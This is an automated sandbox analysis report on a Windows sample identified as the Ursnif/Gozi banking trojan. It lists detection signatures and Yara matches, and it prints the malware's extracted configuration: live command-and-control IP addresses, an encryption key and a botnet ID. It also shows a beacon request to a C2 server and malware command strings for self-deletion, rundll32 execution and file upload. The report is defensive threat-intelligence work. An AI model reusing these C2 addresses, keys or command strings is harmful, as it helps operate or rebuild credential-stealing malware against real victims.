Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
server.exe

Overview

General Information

Sample Name:server.exe
Analysis ID:827617
MD5:a4071382a33bb9fa55ff8bf8b111bc39
SHA1:4eb7f936efe97a88aad9d38452829cd63a3624b2
SHA256:04234564fe449d51f7e685455fcfafb3b7721a0b7d1551e3a370f579a3530e04
Tags:agenziaentrateexegoziisfbmefmiseursnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Contains functionality to call native functions
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Contains functionality to dynamically determine API calls

Classification

Process Tree

  • System is w10x64
  • server.exe (PID: 5084 cmdline: C:\Users\user\Desktop\server.exe MD5: A4071382A33BB9FA55FF8BF8B111BC39)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Gozi, Ursnif2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gozi

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "ScCitKVnthsrIejolA7zuBWvwII2di/DH3GlyTtkQAl5+NYn11P8hoApgIAx8QgiEaRicK3ETZq3j2ua44XjJevEH0XzzTqZAT3wkYswDxrBkgZMCwo6YXkhXitvoh3eARDtRDEkQsoLHZ9GnSskgPPZhcXZcW5DEVGUxmtbXgDaTXEEASp94TxsSTq8LcHFcoUD/3qCUIKISKD7sIV0hgpJQ8kx5Fr/zREoX54YDyuxKi/xJ3SBIavWF9UPU+YwvxpBDYMFrMsKJrjGUlpoQZehisJjttb1cTtggelEGnFr5O2GXefQUuwrSizDeVnMRSAHdds+AiqlPxEl1nFzSfnHhHtw7Ql8JtPTws7Z1Ho=", "c2_domain": ["checklist.skype.com", "5.44.43.17", "31.41.44.108", "62.173.138.213", "109.248.11.174"], "botnet": "7714", "server": "50", "serpent_key": "lk8hY4nisKQzZKXE", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1ca0:$a9: Software\AppDataLow\Software\Microsoft\
    00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0x1228:$a1: /C ping localhost -n %u && del "%s"
      • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xa9c:$a5: filename="%.4u.%lu"
      • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe6d:$a9: &whoami=%s
      • 0xe56:$a10: %u.%u_%u_%u_x%u
      • 0xd63:$a11: size=%u&hash=0x%08x
      • 0xb1d:$a12: &uptime=%u
      • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
      • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
      Click to see the 27 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:192.168.2.45.44.43.1749695802033203 03/16/23-07:23:24.710750
      SID:2033203
      Source Port:49695
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.45.44.43.1749695802033204 03/16/23-07:23:24.710750
      SID:2033204
      Source Port:49695
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: server.exeVirustotal: Detection: 49%Perma Link
      Multi AV Scanner detection for domain / URL
      Source: http://31.41.44.108/Virustotal: Detection: 6%Perma Link
      Machine Learning detection for sample
      Source: server.exeJoe Sandbox ML: detected
      Source: 0.2.server.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: 00000000.00000003.294009819.0000000002B70000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "ScCitKVnthsrIejolA7zuBWvwII2di/DH3GlyTtkQAl5+NYn11P8hoApgIAx8QgiEaRicK3ETZq3j2ua44XjJevEH0XzzTqZAT3wkYswDxrBkgZMCwo6YXkhXitvoh3eARDtRDEkQsoLHZ9GnSskgPPZhcXZcW5DEVGUxmtbXgDaTXEEASp94TxsSTq8LcHFcoUD/3qCUIKISKD7sIV0hgpJQ8kx5Fr/zREoX54YDyuxKi/xJ3SBIavWF9UPU+YwvxpBDYMFrMsKJrjGUlpoQZehisJjttb1cTtggelEGnFr5O2GXefQUuwrSizDeVnMRSAHdds+AiqlPxEl1nFzSfnHhHtw7Ql8JtPTws7Z1Ho=", "c2_domain": ["checklist.skype.com", "5.44.43.17", "31.41.44.108", "62.173.138.213", "109.248.11.174"], "botnet": "7714", "server": "50", "serpent_key": "lk8hY4nisKQzZKXE", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

      Compliance

      barindex
      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
      Source: server.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: Binary string: C:\vecupeha_kocem\hanowida_tiyecu.pdb source: server.exe

      Networking

      barindex
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49695 -> 5.44.43.17:80
      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49695 -> 5.44.43.17:80
      Source: global trafficHTTP traffic detected: GET /drew/L2Ctnat9/M34_2FbYe0ZC9ndvN_2FGmY/27aAwtqf0J/wCDEgzGms_2BItZWy/3Y988SJvsZ8d/G3blEZDMCSE/Bi4DBDrc6fsxs_/2B3aB3ncMi0pp47wsona_/2Bg3i_2FKiTRHGjN/oHTatVB82_2Bul8/TJX3dbVMmJ11Klc61D/Pyd9ldtz9/oHshYCyo8YOqEvONS9ad/fWHuvb04Djokj2GS9tP/hFDYxrH3WbHt3WZEGKZKd7/8Da2SdLCDRHMt/cExDArjC/xj0VJZ2pcmhn5qbmTarHUT8/nHF70Bsig92/tQ.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 5.44.43.17Connection: Keep-AliveCache-Control: no-cache
      Source: Joe Sandbox ViewASN Name: MGNHOST-ASRU MGNHOST-ASRU
      Source: unknownDNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.44.108
      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.44.108
      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.44.108
      Source: server.exe, 00000000.00000002.561015752.00000000048DC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://31.41.
      Source: server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.44.108/
      Source: server.exe, 00000000.00000002.560887520.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.44.108/drew/kSoLH6P3P3ScRZ8VG2/ZyGmCU1Si/Pg3By2fxJOOkAR8rwi0H/T_2F0osErSjTF4ug24E/qpC0b
      Source: server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.44.108/ows
      Source: server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/
      Source: server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/H
      Source: server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/dows
      Source: server.exe, 00000000.00000002.560824916.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/drew/L2Ctnat9/M34_2FbYe0ZC9ndvN_2FGmY/27aAwtqf0J/wCDEgzGms_2BItZWy/3Y988SJvsZ8d/G3
      Source: server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checklist.skype.com/drew/t0_2F8jI1aC786/3pDAJvqTmNvXKWVK8YEK3/dSLDX7_2Bak45Arz/NG3260JY92AIOa
      Source: unknownDNS traffic detected: queries for: checklist.skype.com
      Source: global trafficHTTP traffic detected: GET /drew/L2Ctnat9/M34_2FbYe0ZC9ndvN_2FGmY/27aAwtqf0J/wCDEgzGms_2BItZWy/3Y988SJvsZ8d/G3blEZDMCSE/Bi4DBDrc6fsxs_/2B3aB3ncMi0pp47wsona_/2Bg3i_2FKiTRHGjN/oHTatVB82_2Bul8/TJX3dbVMmJ11Klc61D/Pyd9ldtz9/oHshYCyo8YOqEvONS9ad/fWHuvb04Djokj2GS9tP/hFDYxrH3WbHt3WZEGKZKd7/8Da2SdLCDRHMt/cExDArjC/xj0VJZ2pcmhn5qbmTarHUT8/nHF70Bsig92/tQ.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 5.44.43.17Connection: Keep-AliveCache-Control: no-cache

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTR
      Source: server.exe, 00000000.00000002.560824916.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTR

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.560851312.0000000002D56000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.560764513.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Writes or reads registry keys via WMI
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Writes registry values via WMI
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: server.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
